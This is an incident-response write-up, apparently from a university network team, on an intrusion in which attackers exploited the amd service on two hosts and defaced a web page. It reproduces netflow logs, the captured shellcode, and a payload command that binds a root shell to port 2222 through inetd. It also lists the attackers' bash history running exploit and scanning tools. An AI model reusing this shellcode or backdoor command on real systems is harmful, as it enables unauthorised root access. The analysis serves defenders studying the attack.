After the break-in, they defaced victim1 home page and use victim2 to scan other network.
See
http://www.cert.org/incident_notes/IN-99-05.html
http://www.cert.org/advisories/CA-99-12-amd.html
Jan 12 and 14
Jan 15
Jan 16
Jan 17
Jan 18
Jan 19
Jan 20
Jan 21
Jan 12 and 14
Our router netflow log already picked up some sunprc traffic to victim1. They should
sunrcp be scanning equivalent to "rpcinfo -p" query to victim1 host.
Start Time End Time Source Destination Src port Dst port Pkts Oct =========================================================================================================================== 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.211 1054( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.209 1052( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.210 1053( ) 111 ( sunrpc ) 1 60 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.224 1067( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.208 1051( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.207 1050( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.205 1048( ) 111 ( sunrpc ) 1 60 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.233 1076( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.203 1046( ) 111 ( sunrpc ) 1 60 0112.07:55:50.266 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.201 1044( ) 111 ( sunrpc ) 2 120 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.234 1077( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.202 1045( ) 111 ( sunrpc ) 1 60 0112.07:55:53.262 0112.07:55:53.262 xxx.yyy.33.139 137.189.94.204 1047( ) 111 ( sunrpc ) 1 60 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.213 1056( ) 111 ( sunrpc ) 1 60 0112.07:55:50.270 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.215 1058( ) 111 ( sunrpc ) 2 120 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.214 1057( ) 111 ( sunrpc ) 1 60 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.219 1062( ) 111 ( sunrpc ) 1 60 0112.07:55:53.266 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.218 1061( ) 111 ( sunrpc ) 1 60 0112.07:55:50.270 0112.07:55:53.266 xxx.yyy.33.139 137.189.94.220 1063( ) 111 ( sunrpc ) 2 120 0112.07:55:49.466 0112.07:55:53.594 xxx.yyy.33.139 137.189.94.135 4947( ) 111 ( sunrpc ) 3 156 0112.07:55:49.470 0112.07:55:53.594 xxx.yyy.33.139 137.189.94.138 4950( ) 111 ( sunrpc ) 3 120 0112.07:55:49.502 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.154 4989( ) 111 ( sunrpc ) 6 364 0112.07:55:49.274 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.155 4967( ) 111 ( sunrpc ) 4 216 0112.07:55:49.274 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.153 4965( ) 111 ( sunrpc ) 4 216 0112.07:55:49.266 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.154 4966( ) 111 ( sunrpc ) 4 216 0112.07:55:47.694 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.87 4899( ) 111 ( sunrpc ) 5 240 0112.07:55:47.694 0112.07:55:53.590 xxx.yyy.33.139 137.189.94.86 4898( ) 111 ( sunrpc ) 5 276 0112.07:56:20.262 0112.07:56:28.834 xxx.yyy.33.139 137.189.victim1 2369 ( ) 111 ( sunrpc ) 5 268 0112.07:56:20.678 0112.07:56:26.462 xxx.yyy.33.139 137.189.victim1 2699 ( ) 111 ( sunrpc ) 6 364 0114.21:51:58.779 0114.21:51:59.79 aa.bb.6.29 137.189.victim1 1976 ( ) 111 ( sunrpc ) 3 156Actually, there are at least three hackers (ccc.dd.101.162,aa.bb.6.29,xxx.yyy.33.139) had been port scanning of 137.189 network between 12th Jan and 17th Jan.
0115.08:39:15.319 0115.08:39:17.431 ccc.dd.101.162 137.189.victim1 758 ( nlogin ) 111 ( sunrpc ) 6 288 0115.08:39:15.31 0115.08:39:17.419 ccc.dd.101.162 137.189.victim1 13665 ( ) 111 ( sunrpc ) 3 120 0115.08:39:02.231 0115.08:39:06.351 ccc.dd.101.162 137.189.victim2 06 6206( ) 111 ( sunrpc ) 5 204 0115.08:39:03.511 0115.08:39:06.367 ccc.dd.101.162 137.189.victim2 06 690( ) 111 ( sunrpc ) 6 288Bingo! the amd port is open!
# rpcinfo -p victim1.ie.cuhk.edu.hk program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind 100024 1 udp 1017 status 100024 1 tcp 1019 status 100011 1 udp 604 rquotad 100011 2 udp 604 rquotad 100005 1 udp 614 mountd 100005 1 tcp 616 mountd 100005 2 udp 619 mountd 100005 2 tcp 621 mountd 100005 3 udp 624 mountd 100005 3 tcp 626 mountd 100003 2 udp 2049 nfs 100021 1 udp 1026 nlockmgr 100021 3 udp 1026 nlockmgr 100021 1 tcp 1024 nlockmgr 100021 3 tcp 1024 nlockmgr 300019 1 tcp 656 amd 300019 1 udp 657 amd # /usr/sbin/rpcinfo -p victim2.ie.cuhk.edu.hk program vers proto port 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind 100024 1 udp 1000 status 100024 1 tcp 1002 status 100011 1 udp 1011 rquotad 100011 2 udp 1011 rquotad 100005 1 udp 1021 mountd 100005 1 tcp 1023 mountd 100005 2 udp 602 mountd 100005 2 tcp 604 mountd 100005 3 udp 607 mountd 100005 3 tcp 609 mountd 100003 2 udp 2049 nfs 100021 1 udp 1024 nlockmgr 100021 3 udp 1024 nlockmgr 100021 1 tcp 1024 nlockmgr 100021 3 tcp 1024 nlockmgr 300019 1 tcp 637 amd 300019 1 udp 638 amdAt 18:42, the hacker came again, this time he attacked the amd port. Flushing 5.4 K data to the amd port (657).
0115.18:42:26.179 0115.18:42:46.223 ccc.dd.101.162 137.189.victim1 653 ( ) 657 ( amd ) 5 5480 0115.18:42:32.659 0115.18:43:15.67 ccc.dd.101.162 137.189.victim1 31321 ( ) 2222 ( ) 7 299 0115.18:45:51.282 0115.18:45:56.302 ccc.dd.101.162 137.189.victim2 11 692( ) 638 ( ) 2 2192 0115.18:45:50.766 0115.18:45:50.766 ccc.dd.101.162 137.189.victim2 11 691( ) 111 ( sunrpc ) 1 84 0115.18:45:52.718 0115.18:45:59.958 ccc.dd.101.162 137.189.victim2 06 31369( ) 2222 ( ) 7 299From the system log of victim1, we pick up this:
Jan 15 18:50:08 victim1 27>Jan 15 18:50:08 amd[479]: amq requested mount of ~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~Pë(^~M^^P~I^^~CÃ^H~I^^D~CÃ^C~I^^H~Cë^K~M^N~IÊ3À~IF^L~HF^W~HF^Z°^KÍ~@èÓÿÿÿ18 Jan 1998--str/bin/sh(-c)/bin/echo '2222 stream tcp nowait root /bin/sh s Jan 15 18:50:08 victim1 p/h;/usr/sbin/inetd /tmp/h ~PÒòÿ¿Òòÿ¿^C Jan 15 19:05:22 victim1 rz[25410]: [root] amdex/ZMODEM: 12716 Bytes, 3999 BPS Jan 15 19:05:24 victim1 rz[25410]: [root] pscan.c/ZMODEM: 4805 Bytes, 3759 BPS Jan 15 19:09:46 victim1 rz[25467]: [root] ben.c/ZMODEM: 1536 Bytes, 1972 BPSWhen you look at the tcpdump, it shows:
14:09:19.621925 eth0 < ntec84.1027 > victim.711: udp 1068 ..... ..... 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 9090 ................ 9090 9090 9090 9090 9090 9090 9090 eb28 ...............( 5e8d 5e10 891e 83c3 0889 5e04 83c3 0389 ^.^.......^..... 5e08 83eb 0b8d 0e89 ca33 c089 460c 8846 ^........3..F..F 1788 461a b00b cd80 e8d3 ffff ff31 3820 ..F..........18 4a61 6e20 3139 3938 2d2d 7374 722f 6269 Jan 1998--str/bi 6e2f 7368 282d 6329 2f62 696e 2f65 6368 n/sh(-c)/bin/ech 6f20 2732 3232 3220 2020 2020 2020 2073 o '2222 s 7472 6561 6d20 2074 6370 2020 2020 206e tream tcp n 6f77 6169 7420 2072 6f6f 7420 2020 202f owait root / 6269 6e2f 7368 2073 6820 2d69 273e 3e20 bin/sh sh -i'>> 2f74 6d70 2f68 3b2f 7573 722f 7362 696e /tmp/h;/usr/sbin 2f69 6e65 7464 202f 746d 702f 6820 2623 /inetd /tmp/h 90d2 f2ff bfd2 f2ff bfd2 f2ff bfd2 f2ff ................ bfd2 f2ff bf00 0000 ........ 14:09:21.611670 eth0 < ntec84.1098 > victim.2222: S 2946836865:2946836865(0) win 32120Note, victim1 clock is about 8 minutes in advance(DF) 4500 003c 1342 4000 4006 a5a2 c0a8 8054 E..<.B@.@......T c0a8 8032 044a 08ae afa5 2981 0000 0000 ...2.J....)..... a002 7d78 d5b3 0000 0204 05b4 0402 080a ..}x............ 0b5e 8186 0000 0000 0103 0300 .^..........
"2222 stream tcp nowait root /bin/sh -i"
At 18:58:52, another hacker (may be the same one with different IP) from 63.14.53.109, got into victim1 root through 2222 port and then use victim1 to scan 207.246. network.
0115.18:57:00.569 0115.18:58:52.533 63.14.53.109 137.189.victim1 1083 ( ) 2222 ( ) 97 22708 0115.19:00:49.724 0115.19:00:49.724 207.246.1.80 137.189.victim1 111 ( sunrpc ) 1594 ( ) 1 40 0115.19:00:49.612 0115.19:00:49.612 207.246.1.75 137.189.victim1 111 ( sunrpc ) 1589 ( ) 1 40 ... ... Between 19:00:49 and 19:16:46, the hacker had made 6578 sunrpc scans ! ... ... 0115.19:16:46.965 0115.19:16:47.513 207.246.159.34 137.189.victim1 111 ( sunrpc ) 790 ( ) 4 496 0115.19:16:46.797 0115.19:16:47.333 207.246.159.32 137.189.victim1 111 ( sunrpc ) 786 ( ) 4 496From the .bash_history, we have some idea what the hacker was doing at that time:
ls -l /pwd pwd ls -l pwd uname -a; pwd; ls cd home ls cd httpd ls cd html ls ./amdex 207.246.0.2 ./amdex chmod +x amdex ls ./amdex ./amdex 207.246.0.2 ./amdex 207.246.0.51 ./amdex 207.246.1.3 ./amdex 207.246.2.213 ./amdex 207.246.2.253 ./amdex 207.246.3.251 ./amdex 207.246.3.254 ./amdex 207.246.52.250 ls ps ux who kill -9 26859 killall * ps ux kill -9 25479 ps ux kill -9 25867 ps ux ls cd home ls cd httpd ls cd html rz ls make pscan.c ls make pscan ls rm *.c ls ./pscan ./pscan 207.246 111 & ls rz make ben ls cat wuftp.log ./pscan 207.246 111 & ps ux ls cat wuftp.log cat wuftp.log ps ux sssls ps ux kill -9 25867 ps ux kill -9 25866 ps ux killall ./* ls ps ux ls rm ben* ls rm pscan rm *.log
amdex should be the program to attack amd port while pscan should be some scanning tool.
First the hacker try to attack some 207.246. hosts by amdex program. However, it seems that it was not effective. Hence, he killed the amdex process and started the pscan instead. As the hacker had removed the pscan and ben programs, we do not know what they really did at victim1.
Since the 2222 port backdoor has opened, there are at least 9 hackers had visited victim1 in the following days. They went in and out the victim1 as they wish.
There are also at least 14 hackers had visited victim2 between 15th Jan and 20th Jan
Wow...... What a party!
This day that the victim1 web pages changed.
There were still many hackers visited victim1 through 2222 on that day.
0116.15:31:52.826 0116.15:32:18.770 xx.14.43.220 137.189.victim1 1107 ( ) 2222 ( ) 7 306 0116.15:40:20.265 0116.15:40:34.1 yyy.197.58.25 137.189.victim1 1959 ( ) 2222 ( ) 5 208 0116.15:41:24.957 0116.15:41:26.829 yyy.197.58.25 137.189.victim1 1959 ( ) 2222 ( ) 5 213 0116.15:46:37.649 0116.15:46:37.917 yyy.197.58.25 137.189.victim1 1959 ( ) 2222 ( ) 2 80 0116.16:34:26.144 0116.16:34:27.180 yyy.253.90.32 137.189.victim1 1138 ( ) 2222 ( ) 3 128 0116.16:33:58.680 0116.16:34:24.560 xx.14.43.220 137.189.victim1 1351 (equationb) 2222 ( ) 8 328 0116.16:36:32.280 0116.16:37:51.344 xx.14.43.220 137.189.victim1 1353 ( ) 2222 ( ) 21 874 0116.16:36:47.399 0116.16:38:21.583 yyy.253.90.32 137.189.victim1 1138 ( ) 2222 ( ) 9 458 0116.16:39:07.903 0116.16:39:07.903 yyy.253.42.1 137.189.victim1 0 ( ) 2816 ( ) 1 56 0116.16:39:42.567 0116.16:39:45.639 xx.14.43.220 137.189.victim1 1353 ( ) 2222 ( ) 3 120 0116.16:40:35.191 0116.16:40:49.19 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 6 254 0116.16:40:57.975 0116.16:40:57.975 yyy.253.42.1 137.189.victim1 0 ( ) 2816 ( ) 1 56 0116.16:46:09.702 0116.16:46:10.842 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 3 140 0116.16:47:13.546 0116.16:47:18.918 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 6 248 0116.16:48:10.818 0116.16:48:52.886 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 6 271 0116.17:23:11.712 0116.17:24:00.240 yyy.253.90.46 137.189.victim1 1146 ( ) 2222 ( ) 75 33065 0116.17:25:16.336 0116.17:25:41.368 yyy.253.90.46 137.189.victim1 1155 ( ) 80 ( www ) 10 1217 0116.17:25:13.60 0116.17:25:35.824 yyy.253.90.46 137.189.victim1 1154 ( ) 80 ( www ) 12 1559 0116.17:25:57.40 0116.17:26:22.940 yyy.253.90.46 137.189.victim1 1161 ( ) 80 ( www ) 34 2229 0116.17:26:05.164 0116.17:26:28.692 xx.14.43.220 137.189.victim1 1374 ( ) 80 ( www ) 12 1661 0116.17:26:09.288 0116.17:26:34.196 xx.14.43.220 137.189.victim1 1375 ( ) 80 ( www ) 10 1268 0116.17:27:13.256 0116.17:27:33.416 xx.14.43.220 137.189.victim1 1376 ( ) 80 ( www ) 11 1791 0116.17:27:14.904 0116.17:27:38.916 xx.14.43.220 137.189.victim1 1377 ( ) 80 ( www ) 8 1448By comparing the time stamp of the changed web page and message log, we believe that 209.253.90.46 made the change.
Jan 16 17:31:31 victim1 rz[29281]: [root] index.htm/ZMODEM: 423 Bytes, 402 BPS Jan 16 17:31:45 victim1 rz[29281]: [root] root.JPG/ZMODEM: 16476 Bytes, 1279 BPSFrom the .bash_history, we can see
who woot cd home/httpd/html Is ls mv index.html index2.html ls rz mv index.htm index.html w00t heat#So the victim1 is put on the hacked site list as shown at www.attrition.org/mirror/attrition/2000-01.html Since the web page has changed, there were many 80 port traffic to victim1 so that the heat group can show off around. :(
Actually, victim1 and victim2 does not provide any service for any user. It has never been announced to anyone before. The hacker should pin point this host by their network scanning tool. Hackers are always finding holes to exploit.
Here is some references. You may take a look at it if you are interested and have time. :)